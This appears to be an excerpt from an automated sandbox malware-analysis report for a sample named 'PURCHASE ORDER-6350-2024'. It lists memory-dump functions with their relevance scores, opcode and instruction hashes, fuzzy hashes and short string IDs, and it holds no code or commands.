                                                  • Opcode ID: 6e0621bbdd7cd014a3d6c5ffa6639a5ed3d2bd4bfc29d011e96b784ec8fb7cff
                                                  • Instruction ID: 92df7a93e70a414f7514375aeb678e901ef3b24e58e00dfdadd8c877f5a026fa
                                                  • Opcode Fuzzy Hash: 6e0621bbdd7cd014a3d6c5ffa6639a5ed3d2bd4bfc29d011e96b784ec8fb7cff
                                                  • Instruction Fuzzy Hash: F3210774D157488FEB58CFAAC9546EEBBF6AF99304F14D02AC419AF358DB700906CB90
                                                  Function 06E16130 Relevance: 1.3, Strings: 1, Instructions: 66COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2058380748.0000000006E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E10000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_6e10000_PURCHASE ORDER-6350-2024.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: 8aq
                                                  • API String ID: 0-538729646
                                                  • Opcode ID: 11127c00202500c94269bec9b8bcc7b0c3fc54a82f0de250bfaa07a0de865ee2
                                                  • Instruction ID: 2753c9b0dfa4dcab0297f18e316a8c07a536112a1b9e5d4886cc9a0e0704debb
                                                  • Opcode Fuzzy Hash: 11127c00202500c94269bec9b8bcc7b0c3fc54a82f0de250bfaa07a0de865ee2
                                                  • Instruction Fuzzy Hash: 0A113375B04304CFEB859F789D04AAE77F7AB89205B14447AD60ADF382EA30CD088792
                                                  Function 06E1ABF0 Relevance: 1.3, Strings: 1, Instructions: 63COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2058380748.0000000006E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E10000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_6e10000_PURCHASE ORDER-6350-2024.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: Te]q
                                                  • API String ID: 0-52440209
                                                  • Opcode ID: 619e97487e05a1d08604ea3a824e02f758aec96ffcab6fbf137589f679600138
                                                  • Instruction ID: 353d17f2fb8c71423f122085bd0ea5ef7edc86afadbc2441f58742e394c53e3b
                                                  • Opcode Fuzzy Hash: 619e97487e05a1d08604ea3a824e02f758aec96ffcab6fbf137589f679600138
                                                  • Instruction Fuzzy Hash: 4621D570D057488BEB48CFAAC9546EEBBF6AF99300F14D02AC419AF358DB700906CB80
                                                  Function 06E1BC31 Relevance: 1.3, Strings: 1, Instructions: 58COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2058380748.0000000006E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E10000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_6e10000_PURCHASE ORDER-6350-2024.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: ;
                                                  • API String ID: 0-1661535913
                                                  • Opcode ID: c78dc706c34efc8f7e3e4488269fe4e6b0eda3f1b7e326c4c1248e355dea6c96
                                                  • Instruction ID: 438989e6facb717917a02da3570fe31f53d5daa2c08bf4a80875e0c173da60fb
                                                  • Opcode Fuzzy Hash: c78dc706c34efc8f7e3e4488269fe4e6b0eda3f1b7e326c4c1248e355dea6c96
                                                  • Instruction Fuzzy Hash: 86215830948349CFDB90CF94C484AECBBB6AF0A311F206185D409EF605C7399989DB50
                                                  Function 06E1ACD6 Relevance: 1.3, Strings: 1, Instructions: 45COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2058380748.0000000006E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E10000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_6e10000_PURCHASE ORDER-6350-2024.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: Te]q
                                                  • API String ID: 0-52440209
                                                  • Opcode ID: b6d748f70039af6c8309b75d2f859db40e737e1603f1f082dbd1da5734fde62b
                                                  • Instruction ID: edbaee35a33c4b45bdddb4e1a469860cdce77a910d1dd3136f70a33ec0576b70
                                                  • Opcode Fuzzy Hash: b6d748f70039af6c8309b75d2f859db40e737e1603f1f082dbd1da5734fde62b
                                                  • Instruction Fuzzy Hash: 05117F75E00209CFDB09DFE8C5849EDBBB2FB88310F60812ADA19AB355C631A956CF50
                                                  Function 06E1AD5D Relevance: 1.3, Strings: 1, Instructions: 44COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2058380748.0000000006E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E10000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_6e10000_PURCHASE ORDER-6350-2024.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: Te]q
                                                  • API String ID: 0-52440209
                                                  • Opcode ID: c6ce6f738b5e0e488dffee461877c5bddb15980f63c18253c90ad5f86bb39d26
                                                  • Instruction ID: a80e23b7403a90c665f5eed674b300e1117026911e3fea7c9de507012f3cc6a4
                                                  • Opcode Fuzzy Hash: c6ce6f738b5e0e488dffee461877c5bddb15980f63c18253c90ad5f86bb39d26
                                                  • Instruction Fuzzy Hash: F4117275E01209DFCB05CFE8D4849ADFBB2FF48314F60416ADA09AB355C6326956CF50
                                                  Function 06E15190 Relevance: .4, Instructions: 389COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2058380748.0000000006E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E10000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_6e10000_PURCHASE ORDER-6350-2024.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 9bfa470b0b51011cfcca071a1dc4812bfb22e2b6ca83a98fcd12327895f32656
                                                  • Instruction ID: 87a5949b1389003f867f5603685fc62855214b4bf8128447bf17826068b425ca
                                                  • Opcode Fuzzy Hash: 9bfa470b0b51011cfcca071a1dc4812bfb22e2b6ca83a98fcd12327895f32656
                                                  • Instruction Fuzzy Hash: 8CD1137090E394DFC7169FB8886019A7FB1EFC6300B1584D7D092CF2A3DA788909C7A6
                                                  Function 06E130F0 Relevance: .3, Instructions: 332COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2058380748.0000000006E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E10000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_6e10000_PURCHASE ORDER-6350-2024.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 3ec04f61b77bb961560dfdb22eca88aabac18c1b5e9f118ec05c3785081239f8
                                                  • Instruction ID: eafc5fa5d8f7897a939f733ac6752002e4cd3babb29424b4b6bc3fc77984393e
                                                  • Opcode Fuzzy Hash: 3ec04f61b77bb961560dfdb22eca88aabac18c1b5e9f118ec05c3785081239f8
                                                  • Instruction Fuzzy Hash: 57F1B771D1061ACBCF10DFA8C854AEDB7B5FF99300F1086A9E559B7214EB70AA85CF90
                                                  Function 06E130DF Relevance: .3, Instructions: 307COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2058380748.0000000006E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E10000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_6e10000_PURCHASE ORDER-6350-2024.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: e62ab6a7e4e69bf9f8714fdd714c9fa09986b773c06ffd1b33183660ebcb3aa6
                                                  • Instruction ID: c7074ab7868f48ed4295ef34a5b26e6fd60a5e16bf0ed21c92a48a0011d35e3d
                                                  • Opcode Fuzzy Hash: e62ab6a7e4e69bf9f8714fdd714c9fa09986b773c06ffd1b33183660ebcb3aa6
                                                  • Instruction Fuzzy Hash: CCE1D871D1061A8FCF50DFA8C8545EDB7B5BF59300F1086AAE549B7214EB70AA89CF90
                                                  Function 06E13700 Relevance: .3, Instructions: 305COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2058380748.0000000006E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E10000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_6e10000_PURCHASE ORDER-6350-2024.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 0fed334f125c3265baf8120b9fc656d06b6b407658b9df7c25a349936119a903
                                                  • Instruction ID: d8c6a96923a58c7616472168a83e6ce7375d7aa6b7f90ae7f35d801a245c88b7
                                                  • Opcode Fuzzy Hash: 0fed334f125c3265baf8120b9fc656d06b6b407658b9df7c25a349936119a903
                                                  • Instruction Fuzzy Hash: 14C16B31F10219CFDB54DF68C8546EDB7B2BF85304F1485A9D44ABB264EB30AE85CB91
                                                  Function 06E12380 Relevance: .2, Instructions: 207COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2058380748.0000000006E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E10000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_6e10000_PURCHASE ORDER-6350-2024.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 71c21c0560bd2ffde863ed76cab513a4d2560eb4d75ab78795a608661bf5db3f
                                                  • Instruction ID: c05dc303b64b18848cf186e4f377fe7ce90bda055f7bf1f24e50306f78bb7437
                                                  • Opcode Fuzzy Hash: 71c21c0560bd2ffde863ed76cab513a4d2560eb4d75ab78795a608661bf5db3f
                                                  • Instruction Fuzzy Hash: 4F81D230E10219DFDB55EF68D8986ECBBB0FF44314F115069D146AB2A8EB30DAA5DB81
                                                  Function 06E17B59 Relevance: .2, Instructions: 197COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2058380748.0000000006E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E10000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_6e10000_PURCHASE ORDER-6350-2024.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 60d93b5e76e189fe974246202b22da0822feccafff1edeec3b7d50576bb8c6b7
                                                  • Instruction ID: 84ec23f75367529fa0f82332ef97f60d5df0ac6b7cc5bd40dc2f933254069400
                                                  • Opcode Fuzzy Hash: 60d93b5e76e189fe974246202b22da0822feccafff1edeec3b7d50576bb8c6b7
                                                  • Instruction Fuzzy Hash: 41818B70A042598FDF54CFA8C590AEEBBF2BF44700F1094AAD4669B385D730DD42DB90
                                                  Function 06E17BE9 Relevance: .2, Instructions: 172COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2058380748.0000000006E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E10000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_6e10000_PURCHASE ORDER-6350-2024.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: e32b02209fd2d769b6476baa6bac1f375f96a18cffee3db350202d16a3dd2a1a
                                                  • Instruction ID: cc55ee4a30f87075acef4053b7adaea672f235679564a1f7278f5c04b67e152a
                                                  • Opcode Fuzzy Hash: e32b02209fd2d769b6476baa6bac1f375f96a18cffee3db350202d16a3dd2a1a
                                                  • Instruction Fuzzy Hash: 05616970E046198FDF44CFA9C590AEEBBF2BF48700F10999AD4669B245D734DD42DB90
                                                  Function 06E173F7 Relevance: .2, Instructions: 166COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2058380748.0000000006E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E10000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_6e10000_PURCHASE ORDER-6350-2024.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 6c21f9d692eaf05f2e64c022186c63428ea02035dfa3af01a9e225c6e9e36e0b
                                                  • Instruction ID: 17a43587b16f6e44b3f8ade1309c1d1941e5274cc80d86ca52a55dc5d0494d3a
                                                  • Opcode Fuzzy Hash: 6c21f9d692eaf05f2e64c022186c63428ea02035dfa3af01a9e225c6e9e36e0b
                                                  • Instruction Fuzzy Hash: C1519330E00205DFEF449FE9C9517EEBBB2BF44B00F108526E952AB385DB349942DB91
                                                  Function 06E14F18 Relevance: .2, Instructions: 158COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2058380748.0000000006E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E10000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_6e10000_PURCHASE ORDER-6350-2024.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: b23dd99a2ee5cb25617c186d770d84c282d5dd150a505ab7b4ed95fbf989de47
                                                  • Instruction ID: 95e37b9799f4b1490857f8bb76de8efb299caa3411eb2584866edc330cbc878c
                                                  • Opcode Fuzzy Hash: b23dd99a2ee5cb25617c186d770d84c282d5dd150a505ab7b4ed95fbf989de47
                                                  • Instruction Fuzzy Hash: 1A51A131B002459FD705AF78D445AAEBBB2BF89300F14C4A9D995AF39ACF316949C781
                                                  Function 06E14F28 Relevance: .2, Instructions: 152COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2058380748.0000000006E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E10000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_6e10000_PURCHASE ORDER-6350-2024.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: beb4d0cafd12ec6b9bb161d3829150c27790733969068d719fb8aead5e2f6faa
                                                  • Instruction ID: 98bafca0e91af268e51370a5badc84c2fef3d23c326aaa97247ff075935be7f2
                                                  • Opcode Fuzzy Hash: beb4d0cafd12ec6b9bb161d3829150c27790733969068d719fb8aead5e2f6faa
                                                  • Instruction Fuzzy Hash: 8F519031B002059BD704AFB8D545AAEBBB3BF89300F14C4A9DD956F39ACF316949C781
                                                  Function 06E16A88 Relevance: .1, Instructions: 147COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2058380748.0000000006E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E10000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_6e10000_PURCHASE ORDER-6350-2024.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: cfcac57783071d02df33583a4c92f7c28c00023bb4cbe07695f262815533fa86
                                                  • Instruction ID: a0f18695ea1fc854ec1278d3e193800817ad894979ef9089252c684d33c311aa
                                                  • Opcode Fuzzy Hash: cfcac57783071d02df33583a4c92f7c28c00023bb4cbe07695f262815533fa86
                                                  • Instruction Fuzzy Hash: 1251D131E04315AFEB50CFA8C844ABEBBF6FB48341F149066E501EF286D634C945DB91
                                                  Function 06E10338 Relevance: .1, Instructions: 145COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2058380748.0000000006E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E10000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_6e10000_PURCHASE ORDER-6350-2024.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: c203db585ae25d1d6afc5774b950340497d189c3d1e7d4f0df73e01f094a4438
                                                  • Instruction ID: ab225e898acae3a477e67b8b32bd3bb598d075f3b241afaa8dae77c2ce030a4c
                                                  • Opcode Fuzzy Hash: c203db585ae25d1d6afc5774b950340497d189c3d1e7d4f0df73e01f094a4438
                                                  • Instruction Fuzzy Hash: 4C515C70E00208CFCB55DFA8D598A9EBBF2EF99315F148469E406AB361DB35DC82CB50
                                                  Function 06E141C8 Relevance: .1, Instructions: 132COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2058380748.0000000006E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E10000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_6e10000_PURCHASE ORDER-6350-2024.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: f4c73e0089890600de967620f2754aedd77ef28920a36091f572db674a4e5b92
                                                  • Instruction ID: aaf9efd20353698c64261efada8b67d5257e0c8ffcb6a1fe53754700be564775
                                                  • Opcode Fuzzy Hash: f4c73e0089890600de967620f2754aedd77ef28920a36091f572db674a4e5b92
                                                  • Instruction Fuzzy Hash: BE418E30A11305CFEB99DFA4E958AAEB7F6AF85300F148169D812DB394DE31D841CB91
                                                  Function 06E13E68 Relevance: .1, Instructions: 131COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2058380748.0000000006E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E10000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_6e10000_PURCHASE ORDER-6350-2024.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 39b0d8fa46fecd6d72a4cb6ee00b9ab21bb8423a70dbdb6eba13014cdd30ee1f
                                                  • Instruction ID: 9308d6599a0a6bf9b2cac217c6ec098412bc2045492f73f808fcc127a27d5798
                                                  • Opcode Fuzzy Hash: 39b0d8fa46fecd6d72a4cb6ee00b9ab21bb8423a70dbdb6eba13014cdd30ee1f
                                                  • Instruction Fuzzy Hash: 1A518231E10609DFCB04EFA8D8849EDF7B5FF89300F10856AE555AB320EB71A949CB90
                                                  Function 06E1E1AF Relevance: .1, Instructions: 127COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2058380748.0000000006E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E10000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_6e10000_PURCHASE ORDER-6350-2024.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 8c8296b10c6dc6c3e43621e8072c5b0e808b3a271f23d8ec1dfb3f116dda938b
                                                  • Instruction ID: 6efef55c80f536054cf69b95f4c89ac4e52def6e70c15686ff1726238b518491
                                                  • Opcode Fuzzy Hash: 8c8296b10c6dc6c3e43621e8072c5b0e808b3a271f23d8ec1dfb3f116dda938b
                                                  • Instruction Fuzzy Hash: 30513774906205CFD790DF68E6489ACBBF6FB09302B40A065F90A9F352DB34AD46DF51
                                                  Function 06E12170 Relevance: .1, Instructions: 125COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2058380748.0000000006E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E10000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_6e10000_PURCHASE ORDER-6350-2024.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 728f4e556aa1a7c5e7c055b24d72ee946008ad0e02a16b3655a7d8d578d27097
                                                  • Instruction ID: bf903969c2f3f6c4e321470e4fd3d7a9ac15d41c2445de90bbf7ef34dc6fe339
                                                  • Opcode Fuzzy Hash: 728f4e556aa1a7c5e7c055b24d72ee946008ad0e02a16b3655a7d8d578d27097
                                                  • Instruction Fuzzy Hash: F0416D30A112099FDB54EFA9D850AADBBF6EF89314F148569E501FB3A0DB30D981DB90
                                                  Function 06E1A0EB Relevance: .1, Instructions: 124COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2058380748.0000000006E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E10000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_6e10000_PURCHASE ORDER-6350-2024.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: af673d07894554629416a5d798698d14115edeed98addfe6969569eb80575a1f
                                                  • Instruction ID: b5f4789bb08030efa29c75656426b4fd46cee1ccba71eff6d6715fa388242be8
                                                  • Opcode Fuzzy Hash: af673d07894554629416a5d798698d14115edeed98addfe6969569eb80575a1f
                                                  • Instruction Fuzzy Hash: 4441E570A0A305CFD760CFAED8002BABBB5AF85300F14917BE556CF292D279C548E7A1
                                                  Function 06E10328 Relevance: .1, Instructions: 116COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2058380748.0000000006E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E10000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_6e10000_PURCHASE ORDER-6350-2024.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: fcff40f9104133eb554a2c0b227812c26be04a87fe2b4aeb038379481b96ea6d
                                                  • Instruction ID: 79647d1ed1a9227c5ad9ed929386c31a35e9db973e03830d1ee3c0b4a0365e77
                                                  • Opcode Fuzzy Hash: fcff40f9104133eb554a2c0b227812c26be04a87fe2b4aeb038379481b96ea6d
                                                  • Instruction Fuzzy Hash: 16412D70F102088FCB54DFA9D598A9EBBF2AF98314F148469E805AB365DF75DC82CB50
                                                  Function 06E12180 Relevance: .1, Instructions: 115COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2058380748.0000000006E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E10000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_6e10000_PURCHASE ORDER-6350-2024.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 5fe43d5377c5aa69b4e0fb62d4055bf7caa544832d145116a1a06d5c9e766717
                                                  • Instruction ID: a3670115caf2202c5eb2fb481b4031166722ca87829893737402e68b278b16e9
                                                  • Opcode Fuzzy Hash: 5fe43d5377c5aa69b4e0fb62d4055bf7caa544832d145116a1a06d5c9e766717
                                                  • Instruction Fuzzy Hash: 28415B30A102099FDB54DFA9D850AADBBF6EF89314F148569E501EB3A0DB30E981DB90
                                                  Function 06E1514E Relevance: .1, Instructions: 104COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2058380748.0000000006E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E10000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_6e10000_PURCHASE ORDER-6350-2024.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 3142368250779db89cd8073d02041bd95cf94714c5ec75d00993e3008c28e1cf
                                                  • Instruction ID: d528af900c8ee1639bc3b2e0751e7a7b7c40c575d1189d181b3e1ae9714d1572
                                                  • Opcode Fuzzy Hash: 3142368250779db89cd8073d02041bd95cf94714c5ec75d00993e3008c28e1cf
                                                  • Instruction Fuzzy Hash: B431A5727197804FD7165BB898293693FF29B86211F1944A7E442CF2D7CD688C06C761
                                                  Function 06E141A0 Relevance: .1, Instructions: 101COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2058380748.0000000006E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E10000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_6e10000_PURCHASE ORDER-6350-2024.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 3de8e5802fdbcb31971c79fc329595c9a51e4ca390d4e687c68b4ddb76140004
                                                  • Instruction ID: e24495db50afa5494f6587bc83f132c4b980657d1ff5aff3c67e85fd41465d70
                                                  • Opcode Fuzzy Hash: 3de8e5802fdbcb31971c79fc329595c9a51e4ca390d4e687c68b4ddb76140004
                                                  • Instruction Fuzzy Hash: 0C310430A05305DFEBA99F64D944BEE77F6AF85300F249169E802DB390DB30D941DB91
                                                  Function 06E14018 Relevance: .1, Instructions: 100COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2058380748.0000000006E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E10000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_6e10000_PURCHASE ORDER-6350-2024.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: dc08730864a327b325c531aaf79b6df2b3bab0a5a6c05e0f6fdef8b1fbac1b59
                                                  • Instruction ID: d877743a3ac2986afc2bdd3ade8adab78969bbc8f9b1101859d3510a974c60a8
                                                  • Opcode Fuzzy Hash: dc08730864a327b325c531aaf79b6df2b3bab0a5a6c05e0f6fdef8b1fbac1b59
                                                  • Instruction Fuzzy Hash: 3431AE71E10319DFCB54AFA9D85089EBBF6FF84310F10822AE401AB364EB319845CBD1
                                                  Function 06E1C7C8 Relevance: .1, Instructions: 92COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2058380748.0000000006E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E10000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_6e10000_PURCHASE ORDER-6350-2024.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 7b68a00f53f7c64a949e952fa82a13d633cb34bc38fc19cf4b3bb76614affe2c
                                                  • Instruction ID: b43de5650e85b9b106f3f33e0652d49e0c358c03a2efe8dbeed29dedabd17995
                                                  • Opcode Fuzzy Hash: 7b68a00f53f7c64a949e952fa82a13d633cb34bc38fc19cf4b3bb76614affe2c
                                                  • Instruction Fuzzy Hash: 99312574954209CFDB40CF68C5849FDB7BAFB49B01B64A541D50AEB242C738E981EFA0
                                                  Function 06E17FF8 Relevance: .1, Instructions: 88COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2058380748.0000000006E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E10000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_6e10000_PURCHASE ORDER-6350-2024.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 67387e94ec22dc92e102ebca923fba0a869b1812ebcb8d30416a9f02c971de64
                                                  • Instruction ID: 07ac1d8baa30b5d20565d90aa216c63e6f258fa790d98c3b84410177ac851790
                                                  • Opcode Fuzzy Hash: 67387e94ec22dc92e102ebca923fba0a869b1812ebcb8d30416a9f02c971de64
                                                  • Instruction Fuzzy Hash: 0431E430E0A348CFE7A08FA9CC402BBBBB1AF45301F00956BE5A6DF291E3749940D391
                                                  Function 06E10088 Relevance: .1, Instructions: 84COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2058380748.0000000006E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E10000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_6e10000_PURCHASE ORDER-6350-2024.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 01f5ca98c1ce77c8e2fc21c6db4c685ea88ec52c8755a21d5d168eccb9f7ce1e
                                                  • Instruction ID: a3bbb1ed557fef47413ba31ee16dd5a2befeefc7f7de09f0cb90a1dcc51b346b
                                                  • Opcode Fuzzy Hash: 01f5ca98c1ce77c8e2fc21c6db4c685ea88ec52c8755a21d5d168eccb9f7ce1e
                                                  • Instruction Fuzzy Hash: C5314D70A00305EFEB61DF64D898BAEBBF6FF88714F10881DE4569B291CB799944CB50
                                                  Function 06E1E770 Relevance: .1, Instructions: 81COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2058380748.0000000006E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E10000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_6e10000_PURCHASE ORDER-6350-2024.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: e9f7291af3e63238792ec6c42de510d69a37008c38891589f57a4cb70b54dd1d
